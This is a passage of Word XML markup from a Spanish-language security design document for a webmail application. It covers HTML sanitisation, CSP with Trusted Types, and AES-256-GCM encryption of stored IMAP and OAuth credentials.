        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;button&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;textarea&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;select&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se eliminan por completo. De los atributos permitidos, se excluyen todos los event handlers inline (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onclick</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, etc.) y atributos de datos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">data-*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) que podrían usarse para almacenar payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para enlaces (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;a&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), el atributo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se fuerza a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">_blank</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rel="noopener noreferrer"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para prevenir tabnabbing. Las URLs de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">href</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se validan contra una expresión regular que solo permite esquemas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mailto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tel:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cid:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(para imágenes inline de correo).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="147"/>
    <w:bookmarkStart w:id="148" w:name="csp-nonces-trusted-types"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3.3 CSP nonces + Trusted Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En navegadores que soportan Trusted Types (Chromium 83+, Firefox en desarrollo), Webmail 6.0 activa la política adicional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">require-trusted-types-for 'script'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, que obliga a que todo HTML insertado en el DOM pase por un policy de Trusted Types validado. Esto elimina clases enteras de ataques DOM XSS donde un atacante inyecta HTML a través de métodos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">innerHTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document.write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[89]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trustedTypes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trustedTypes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createPolicy</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AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trustedTypes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'email-sanitizer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createHTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (input) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EMAIL_CONFIG)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="148"/>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:id="153" w:name="encriptación-de-datos-sensibles"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4 Encriptación de Datos Sensibles</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="150" w:name="mongoose-aes-encryption-plugin"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4.1 mongoose-aes-encryption plugin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El plugin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mongoose-aes-encryption</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">proporciona cifrado transparente a nivel de campo para schemas Mongoose</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La aplicación lee y escribe valores en texto plano mientras únicamente ciphertext (texto cifrado) persiste en MongoDB. Esto protege las credenciales IMAP incluso si la base de datos se ve comprometida mediante un dump o acceso no autorizado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El plugin se aplica al schema designando qué campos deben cifrarse:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> createAESPlugin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'mongoose-aes-encryption'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createAESPlugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Buffer de 32 bytes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(plugin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imapPassword'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'oauth2AccessToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'oauth2RefreshToken'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sensitive</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Excluir de logs y JSON.stringify por defecto</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">})</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="151" w:name="X2aa293c34f392e8eaa4a381f9c9cdd25c2ce395"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4.2 AES-256-GCM: key 32 bytes, IV 12-16 bytes único</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AES-256-GCM (Galois/Counter Mode) es el modo de operación recomendado porque proporciona cifrado autenticado (AEAD): además de ocultar el contenido, detecta cualquier modificación del ciphertext. Los parámetros son no negociables:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2810"/>
        <w:gridCol w:w="1788"/>
        <w:gridCol w:w="3321"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Parámetro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Algoritmo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AES-256-GCM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cifrado autenticado con tag de 128 bits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">32 bytes (256 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generada con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">crypto.randomBytes(32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">12 bytes (96 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Único por operación; nunca reutilizado con la misma key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Auth Tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">16 bytes (128 bits)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generado automáticamente por GCM; verificado en decrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Key Derivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HKDF-SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Para derivar keys de contextos diferentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La reutilización de un IV con la misma clave en AES-GCM es catastrófica: un atacante con dos ciphertexts cifrados con el mismo IV puede recuperar el XOR de los plaintexts originales, y potencialmente forjar mensajes autenticados. Por ello, Webmail 6.0 genera un IV criptográficamente aleatorio de 12 bytes para cada operación de cifrado usando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto.randomBytes(12)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[108]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[119]</w:t>
      </w:r>
      <w:r>
